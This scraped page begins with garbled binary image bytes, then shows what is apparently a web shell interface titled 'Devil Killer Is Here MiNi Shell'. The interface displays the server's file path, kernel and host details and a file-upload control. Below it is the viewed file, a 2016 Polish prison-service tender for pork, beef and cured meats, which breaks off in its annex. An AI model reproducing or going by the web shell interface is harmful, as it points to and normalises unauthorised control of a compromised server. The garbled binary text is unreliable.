JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160531/60449-N-2016.html

<p class="kh_header"><b>Lubiewo: przetarg nieograniczony na dostawy artykułów stanowiących rodzaj- mięso wieprzowe, wołowe, wędliny.</b><br>
<b>Numer ogłoszenia: 60449 - 2016; data zamieszczenia: 31.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej , 144, 89-526 Lubiewo, woj. kujawsko-pomorskie, tel. 052 33 412 25 wew. 306, faks 0-52 3341225 wew.316.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Służby Więziennej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przetarg nieograniczony na dostawy artykułów stanowiących rodzaj- mięso wieprzowe, wołowe, wędliny..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I:


Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
50


golonka
kg
500


golonka
kg
500


karkówka
kg
150


Kości wieprzowe 
kg
500


łopatka
kg
1800


Mięso gulaszowe
kg
350


Mięso mielone
kg
350


polędwiczki
kg
30


schab
kg
1800


słonina
kg
20


szynka
kg
1800


Tusze wieprzowe 
kg
250


żeberka
kg
350





Część II: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
boczek
kg
1200


podgardle
kg
20


Kości wieprzowe 
kg
400

Część III: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Żołądki wołowe
kg
500


wątroba
kg
400


ozory
kg
20


Część IV: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
szynka
kg
300


szynka
kg
300


szynka
kg
150

Część V: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200

Część VI: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Wędlina krwista
kg
250


kaszanka
kg
300







Część VII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
200


Wędlina  drobno rozdrobniona
kg
250


Wędlina grubo rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
250


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
300


Wędlina  średnio rozdrobniona
kg
800

Część VIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Golonka wieprzowa
kg
50


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
200

Część IX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
250


Wędlina średnio rozdrobniona
kg
700


Wędliny średnio rozdrobnione
kg
400


Wędlina średnio rozdrobniona
kg
400

Część X: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
salami
kg
150


salami
kg
50

Część XI: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Wędliny
15131130-5
Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
600


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
250

Część XII:

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
15131310-1
pasztetowa
kg
200


pasztetowa

30


pasztetowa

50


pasztet

50


pasztetowa

150


Część XIII
 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
wołowina
kg
300

Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej OZ Zwartowo
Część XIV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
20


golonka
kg
50


Karkówka b/k
kg
300


Karkówka z/k
kg
50


Łopatka b/k
kg
300


Łopatka z/k
kg
50


Mięso mielone
kg
100


Polędwiczki wieprzowe 
kg
20


Schab b/k
kg
300


Schab z/k
kg
50


słonina
kg
50


Szynka b/k
kg
400


Szynka z/k
kg
50


żeberka
kg
100

Część XV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
Boczek wędzony
kg
150


Polędwica wędzona
kg
50


baleron
kg
100

Część XVI: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Flaki wołowe
kg
100

Część XVII: 


Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
Szynka gotowana
kg
100


Szynka wędzona
kg
100

Część XVIII: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Baton drobiowy
kg
50


Mielonka drobiowa
kg
100


Polędwica drobiowa
kg
50


Pierś drobiowa
kg
50


Śniadaniowa drobiowa
kg
50


Szynka tostowa drobiowa
kg
30


Rolada drobiowa
kg
50


Szynka drobiowa
kg
50

Część XIX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Salceson czarny
kg
150


Salceson ozorkowy
kg
15


krupnioki
kg
30


kaszanka
kg
200

Część XX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Luncheon meat (lanszmit)
kg
150


metka
kg
80


mortadela
kg
150


Parówka cienka
kg
80


Parówka - serdelka
kg
80


Parówka hot-dog
kg
50



Część XXI: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Kiełbasa śląska
kg
100


Kiełbasa zwyczajna
kg
400


Kiełbasa toruńska
kg
100


kabanosy
kg
30


Kiełbasa biała parzona
kg
250


Część XXII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
Salami
kg
10
2


Wędliny
151 311 30-5
Krakowska parzona
kg
100


ogonówka
kg
150


Szynka konserwowa prasowana
kg
50


szynkowa
kg
100


żywiecka
kg
100

Część XXIII: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
151 313 10-1
pasztetowa
kg
150

Część XXIV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
Wołowina b/k
kg
150.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>okres związania cenami określonymi w ofercie wynosi 30 dni od daty podpisania umowy. po tym okresie strony dopuszczają zmiany cen określonych w ofercie dostarczanych produktów, z zastrzeżenie, iż zostaną spełnione łącznie następujące warunki:1)wyłącznym powodem zmiany cen będzie zmiana kwartalnego wskaźnika cen towarów i usług konsumpcyjnych ogłoszonych przez Prezesa GUS w Monitorze Polskim po 30 dniach od podpisania umowy, 2) zmiana cen odpowiadać będzie, z uwzględnieniem pkt. 3 i 4 poniżej, zmianie wskaźnika, o którym mowa w pkt. 1 za ostatni kwartał, a jesli w poprzednim kwartale lub w poprzednich kwartałach ceny nie były zmieniane, sumie wskaźników kwartalnych od ostatniej zmiany cen lub od daty, w której upłynął termin związania ceną, 3) zmiana ceny danego produktu wynosić będzie co najmniej 1 grosz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej, 89-526 Lubiewo, Sucha 144..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2016 godzina 10:00, miejsce: Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej, 89-526 Lubiewo, Sucha 144 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wieprzowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I:


Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
50


golonka
kg
500


golonka
kg
500


karkówka
kg
150


Kości wieprzowe 
kg
500


łopatka
kg
1800


Mięso gulaszowe
kg
350


Mięso mielone
kg
350


polędwiczki
kg
30


schab
kg
1800


słonina
kg
20


szynka
kg
1800


Tusze wieprzowe 
kg
250


żeberka
kg
350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mięso suszone, solone, wędzone lub marynowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
boczek
kg
1200


podgardle
kg
20


Kości wieprzowe 
kg
400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> podroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Żołądki wołowe
kg
500


wątroba
kg
400


ozory
kg
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> szynka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
szynka
kg
300


szynka
kg
300


szynka
kg
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> kaszanka i inne wędliny krwiste.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Wędlina krwista
kg
250


kaszanka
kg
300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.34-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
200


Wędlina  drobno rozdrobniona
kg
250


Wędlina grubo rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
250


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
300


Wędlina  średnio rozdrobniona
kg
800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Golonka wieprzowa
kg
50


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
